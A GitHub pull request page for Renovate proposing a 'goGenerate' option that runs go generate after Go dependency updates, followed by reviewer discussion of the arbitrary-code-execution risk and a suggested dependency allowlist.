这是indexloc提供的服务,不要输入任何密码
Skip to content

feat: add support for go:generate directives in gomod #39163

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

feat: add support for go:generate directives in gomod #39163

wants to merge 1 commit into from
+121 −0

Conversation

@mglazer
Copy link
Contributor

@mglazer mglazer commented Nov 7, 2025

Changes

This change adds a goGenerate postUpdateOption which enables running go generate ./... after a dependency update.

Frequently when dependencies are brought in via tools or using vendored code, and those dependencies are used for go:generate instructions, we want to update the generated code after the dependency has been updated.

Adding this as a postUpdateCommand wasn't really satisfactory since that necessarily requires making a change in two spots (one in the allowed commands, one in the postUpdateCommand). The other reason this was undesirable was it would cause generate to run after every dependency update, regardless of language.

Context

Please select one of the below:

  • This closes an existing Issue, Closes: #
  • This doesn't close an Issue, but I accept the risk that this PR may be closed if maintainers disagree with its opening or implementation

AI assistance disclosure

Did you use AI tools to create any part of this pull request?

Please select one option and, if yes, briefly describe how AI was used (e.g., code, tests, docs) and which tool(s) you used.

  • No — I did not use AI for this contribution.
  • Yes — minimal assistance (e.g., IDE autocomplete, small code completions, grammar fixes).
  • Yes — substantive assistance (AI generated non‑trivial portions of code, tests, or documentation).
  • Yes — other (please describe):

Documentation (please check one with an [x])

  • I have updated the documentation, or
  • No documentation update is required

How I've tested my work (please select one)

I have verified these changes via:

  • Code inspection only, or
  • Newly added/modified unit tests, or
  • No unit tests but ran on a real repository, or
  • Both unit tests + ran on a real repository

The public repository: n/a (is private)

@CLAassistant
Copy link

CLAassistant commented Nov 7, 2025
edited
Loading

CLA assistant check
All committers have signed the CLA.

@mglazer
feat: add support for go:generate directives in gomod
0685872 
This change adds a `goGenerate` postUpdateOption which enables
running `go generate ./...` after a dependency update.

Frequently when dependencies are brought in via tools or using
vendored code, and those dependencies are used for go:generate
instructions, we want to update the generated code after the dependency
has been updated.

Adding this as a postUpdateCommand wasn't really satisfactory since that
necessarily requires making a change in two spots (one in the allowed
commands, one in the postUpdateCommand). The other reason this was
undesirable was it would cause generate to run after every dependency
update, regardless of language.
@mglazer mglazer force-pushed the mglazer/support-go-generate branch from 0348585 to 0685872 Compare November 7, 2025 14:25
viceice
viceice approved these changes Nov 7, 2025
View reviewed changes
Copy link
Member

@viceice viceice left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM besides some security concerns 🤔

@jamietanna
Copy link
Contributor

jamietanna commented Nov 7, 2025

Yeah this does technically have some very valid risks, because we are now executing arbitrary commands

Note that this does have similar risks to https://docs.renovatebot.com/modules/manager/gradle/#dependency-verification where running ./gradlew ... can effectively execute arbitrary code as part of any of the buildscripts

The code being executed (to generate code) could be maliciously attacked, similar to what we see with npm install's postinstall scripts

@mglazer
Copy link
Contributor Author

mglazer commented Nov 7, 2025

@jamietanna : What is the generally accepted practice for dealing with these types of issues in renovate dependency bumps?

Possible options I can come up with:

  1. Add a configuration option which only runs go:generate when a specific allowlist of dependencies is updated. This would minimize the attack possibilities since it allows me to control which dependencies get this behavior and which dependencies don't.
  2. Run in a sandbox? Honestly unsure if this remotely feasible.

If you think 1 is viable, I suspect the right spot to insert it would be similar to where goGetDirs is currently configured:

https://docs.renovatebot.com/configuration-options/#gogetdirs

and add an option such as:

goGenerateAllowedDeps: [
  "github.com/trusted/dependency"
]

Where the valid config would be:

if empty: run go generate after updating any dependency
if set: only run go generate after updating the dependencies specified in the allowed list

Thoughts?

@jamietanna
Copy link
Contributor

jamietanna commented Nov 13, 2025

(Haven't forgotten about this - will get back to it this week - need to have a think)

@jamietanna jamietanna mentioned this pull request Nov 13, 2025
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@viceice viceice viceice approved these changes

@secustor secustor Awaiting requested review from secustor

@jamietanna jamietanna Awaiting requested review from jamietanna

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@mglazer @CLAassistant @jamietanna @viceice